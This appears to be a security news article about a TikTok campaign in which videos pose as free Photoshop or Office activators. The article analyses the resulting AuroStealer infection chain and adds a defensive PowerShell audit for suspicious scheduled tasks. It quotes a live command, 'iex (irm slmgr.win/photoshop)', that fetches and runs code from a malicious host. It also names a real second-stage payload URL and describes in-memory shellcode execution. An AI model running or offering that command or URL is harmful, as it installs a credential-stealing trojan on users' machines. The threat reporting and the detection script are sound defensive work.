Attackers are exploiting TikTok’s massive reach to trick users into executing malware through seemingly innocuous videos.
In one popular TikTok video (liked over 500 times), the attacker poses as a provider of a free Photoshop activation tool and urges viewers to open PowerShell as an administrator and run:
iex (irm slmgr.win/photoshop)
This command uses Invoke-Expression (iex) to run a script fetched by Invoke-RestMethod (irm) from a malicious host.
Security researchers have uncovered a campaign where threat actors masquerade as Photoshop activators in TikTok clips, directing victims to run PowerShell one-liners that pull and execute malicious code.
The technique mirrors the ClickFix social-engineering scenario, wherein users are similarly duped into clicking and executing code on Microsoft blogs, exposing them to malware installation.
Upon visiting the provided link, victims receive a PowerShell payload (SHA256: 6D897B5661AA438A96AC8695C54B7C4F3A1FBF1B628C8D2011E50864860C6B23) that currently registers a VirusTotal detection rate of 17/63, highlighting its relative novelty and evasion capabilities.
Once the initial script runs, it reaches out to https://file-epq.pages.dev/updater.exe to download the next stage, named Updater.exe (SHA256: 58b11b4dc81d0b005b7d5ecae0fb6ddb3c31ad0e7a9abf9a7638169c51356fd8).
Analysis reveals this binary is AuroStealer, a credential-harvesting trojan known for exfiltrating saved browser passwords and cryptocurrency wallets.
To maintain persistence, the PowerShell script randomly selects a task name from a list of legitimate-looking update task names (e.g., AdobeUpdateTask, WindowsUpdateCheck).
It then creates a scheduled task that launches PowerShell with a hidden window style and an execution-policy bypass, so that Updater.exe runs at user logon without raising suspicion.
The use of legitimate-sounding task names helps the malicious persistence blend into normal system behaviour and evade detection.
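As an added example from the defender's side (not code from the article or the researchers it cites), this PowerShell audit lists scheduled tasks on a host that match the persistence pattern just described: a logon-triggered action that runs PowerShell with a hidden window and an execution-policy bypass, fetches code from the network, or starts a file from a user-writable folder. The argument patterns, the path pattern and the "update"-name heuristic are assumptions chosen for this campaign, not a vendor signature.

```powershell
# Added example, not from the article: audit scheduled tasks on a Windows host
# for the persistence pattern described above (a logon trigger that launches
# PowerShell with a hidden window and an execution-policy bypass, pulls code
# from the network, or starts a file from a user-writable folder).
# Run from an elevated PowerShell session; the patterns below are assumptions
# tuned to this campaign, not a vendor signature.

$suspiciousArgPatterns = @(
    '-(w|win|window|windowstyle)\s+hidden'      # hidden window
    '-(ep|exec|executionpolicy)\s+bypass'       # execution-policy bypass
    '\biex\b|invoke-expression'                 # run a string as code
    '\birm\b|invoke-restmethod|downloadstring'  # fetch code remotely
)
# Locations a real vendor updater rarely runs from (literal %VAR% or expanded).
$userWritablePattern = '%temp%|%appdata%|%localappdata%|\\AppData\\|\\Temp\\|\\Downloads\\'

function Test-SuspiciousTask {
    param($Task)   # one object from Get-ScheduledTask (MSFT_ScheduledTask)
    $reasons = New-Object System.Collections.Generic.List[string]
    foreach ($action in $Task.Actions) {
        $exe       = [string]$action.Execute
        $arguments = [string]$action.Arguments
        if ($exe -match '(powershell|pwsh)(\.exe)?"?$') {
            foreach ($p in $suspiciousArgPatterns) {
                if ($arguments -match $p) { $reasons.Add("PowerShell arguments match '$p'") }
            }
            # An update-themed task name wrapping PowerShell instead of a vendor binary.
            if ($Task.TaskName -match 'update') { $reasons.Add('update-themed name but runs PowerShell') }
        }
        if ("$exe $arguments" -match $userWritablePattern) { $reasons.Add('references a user-writable path') }
    }
    $logon = $Task.Triggers | Where-Object { $_.CimClass.CimClassName -eq 'MSFT_TaskLogonTrigger' }
    if ($reasons.Count -gt 0 -and $logon) { $reasons.Add('runs at user logon') }
    return $reasons
}

# Report every task with at least one finding; review the Command column by hand.
Get-ScheduledTask | ForEach-Object {
    $r = @(Test-SuspiciousTask -Task $_)
    if ($r.Count -gt 0) {
        [pscustomobject]@{
            TaskPath = $_.TaskPath
            TaskName = $_.TaskName
            Author   = $_.Author
            Command  = ($_.Actions | ForEach-Object { "$($_.Execute) $($_.Arguments)" }) -join ' | '
            Reasons  = $r -join '; '
        }
    }
} | Format-Table -AutoSize -Wrap
```

Legitimate tasks occasionally trip the hidden-window or user-path checks, so treat the output as a triage list rather than a verdict, and compare any hit against the task's Author and the file it launches.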
On-The-Fly Compilation and In-Memory Execution
Following the AuroStealer stage, a further payload named source.exe (SHA256: db57e4a73d3cb90b53a0b1401cb47c41c1d6704a26983248897edcc13a367011) is retrieved and launched.
This binary employs an advanced self-compiling malware technique: during execution, it invokes the .NET compiler csc.exe to compile source code stored in a temporary .cmdline file.
The compiled class contains P/Invoke declarations for VirtualAlloc, CreateThread, and WaitForSingleObject, enabling it to allocate memory, copy shellcode directly into the process, spawn a thread to execute it, and wait indefinitely, resulting in fully in-memory payload execution without the final stage touching the disk.
Such on-demand compilation complicates static analysis and detection, as the final malicious code exists only in ephemeral memory.
Researchers have identified additional TikTok videos from the same campaign using different software lures such as “Activate Office” or “Unlock Windows,” indicating the attackers are iterating on social engineering themes to broaden their reach:
- hxxps://vm.tiktok.com/ZGdaC7EQY/
- hxxps://vm.tiktok.com/ZGdaX8jVq/
This campaign underscores the evolving tactics of cybercriminals, who now exploit short-form video platforms to deliver self-compiling, in-memory malware via PowerShell.
Users should never run terminal commands from unverified sources and platforms should consider alerting viewers when instructions encourage potentially dangerous operations.
As attackers persistently innovate, combining novel distribution channels and anti-analysis techniques, security awareness and robust endpoint defenses remain the best line of defense against these emerging threats.